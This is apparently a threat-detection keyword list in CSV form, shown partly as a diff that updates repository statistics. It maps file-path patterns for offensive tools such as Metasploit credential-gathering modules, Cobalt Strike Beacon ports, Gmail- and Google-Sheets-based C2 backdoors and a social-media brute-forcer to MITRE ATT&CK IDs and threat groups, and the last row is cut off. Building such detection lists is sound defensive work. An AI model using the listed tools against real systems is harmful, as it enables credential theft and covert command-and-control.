"*/ftp-anon.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ftp-bounce.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ftp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -3632,45 +3646,46 @@ "*/full-nelson64*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/FunctionalC2/*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*/fuzz.txt*","offensive_tool_keyword","fuzz.txt","list of sensible files for fuzzing in system","T1210 - T1190 - T1203 - T1114","TA0002 - TA0003 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Bo0oM/fuzz.txt/blob/master/fuzz.txt","1","1","N/A","N/A","10","2669","479","2023-07-20T13:26:37Z","2016-01-19T13:35:44Z" -"*/fuzzers/dns*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/fuzzers/ftp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/fuzzers/http*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/fuzzers/ntp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/fuzzers/smb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/fuzzers/smtp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/fuzzers/ssh*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/fuzzers/dns*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/ftp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/http*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/ntp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/smb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/smtp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/ssh*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/G0ldenGunSec/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/GadgetToJScript.git*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*/gandcrab.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/ganglia-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/gather/credentials*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/gather/forensics*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/gather/credentials*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/gather/forensics*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/gato/*attack.py*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","1","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z" "*/GC2-sheet/*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" "*/gcat.git*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "*/gcat.py","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" -"*/geacon/*beacon*","offensive_tool_keyword","cobaltstrike","Practice 
Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" -"*/geacon_pro*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" -"*/Gemail-Hack.git*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","9","813","385","2022-02-18T16:12:45Z","2018-04-19T13:48:41Z" +"*/geacon/*beacon*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/geacon_pro*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/Gemail-Hack.git*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","9","815","385","2022-02-18T16:12:45Z","2018-04-19T13:48:41Z" "*/GetBrowsers.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation 
